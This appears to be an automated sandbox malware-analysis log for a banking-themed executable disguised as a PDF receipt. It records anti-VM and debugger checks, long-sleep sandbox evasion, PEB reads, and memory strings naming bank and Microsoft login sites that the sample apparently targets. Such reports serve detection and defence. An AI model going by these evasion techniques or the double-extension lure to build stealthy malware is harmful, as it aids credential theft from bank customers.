Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe PID: 3800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OkLsTLaTTZVp.exe PID: 7096, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 21C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 2470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 4470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 7610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 8610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 88D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 98D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 2CD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 4E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 7B40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 8B40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 7B40000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E rdtsc 10_2_01AC096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3092 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4242 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 2156 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 7815 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\sc.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe TID: 1020 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 3092 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 187 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2360 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5880 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe TID: 5432 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep count: 2156 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep time: -4312000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep count: 7815 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep time: -15630000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -85000s >= -30000s
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep count: 40 > 30
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep count: 40 > 30
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -40000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B4CD50 FindFirstFileW,FindNextFileW,FindClose, 14_2_02B4CD50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx Jump to behavior
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 85664-rN9.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 85664-rN9.14.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 85664-rN9.14.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 85664-rN9.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4520405729.0000000000900000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: 85664-rN9.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20
Source: 85664-rN9.14.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 85664-rN9.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 85664-rN9.14.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 85664-rN9.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 85664-rN9.14.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 85664-rN9.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs - HKVMware20,11696487552]
Source: 85664-rN9.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,116
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 85664-rN9.14.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 85664-rN9.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 85664-rN9.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\sc.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E rdtsc 10_2_01AC096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00418BD3 LdrLoadDll, 10_2_00418BD3
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC0185 mov eax, dword ptr fs:[00000030h] 10_2_01AC0185
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0019F mov eax, dword ptr fs:[00000030h] 10_2_01B0019F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0019F mov eax, dword ptr fs:[00000030h] 10_2_01B0019F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0019F mov eax, dword ptr fs:[00000030h] 10_2_01B0019F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0019F mov eax, dword ptr fs:[00000030h] 10_2_01B0019F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A197 mov eax, dword ptr fs:[00000030h] 10_2_01A7A197
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A197 mov eax, dword ptr fs:[00000030h] 10_2_01A7A197
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A197 mov eax, dword ptr fs:[00000030h] 10_2_01A7A197
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B24180 mov eax, dword ptr fs:[00000030h] 10_2_01B24180
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B24180 mov eax, dword ptr fs:[00000030h] 10_2_01B24180
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3C188 mov eax, dword ptr fs:[00000030h] 10_2_01B3C188
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3C188 mov eax, dword ptr fs:[00000030h] 10_2_01B3C188
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B561E5 mov eax, dword ptr fs:[00000030h] 10_2_01B561E5
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB01F8 mov eax, dword ptr fs:[00000030h] 10_2_01AB01F8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B461C3 mov eax, dword ptr fs:[00000030h] 10_2_01B461C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B461C3 mov eax, dword ptr fs:[00000030h] 10_2_01B461C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov ecx, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB0124 mov eax, dword ptr fs:[00000030h] 10_2_01AB0124
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B40115 mov eax, dword ptr fs:[00000030h] 10_2_01B40115
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2A118 mov ecx, dword ptr fs:[00000030h] 10_2_01B2A118
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2A118 mov eax, dword ptr fs:[00000030h] 10_2_01B2A118
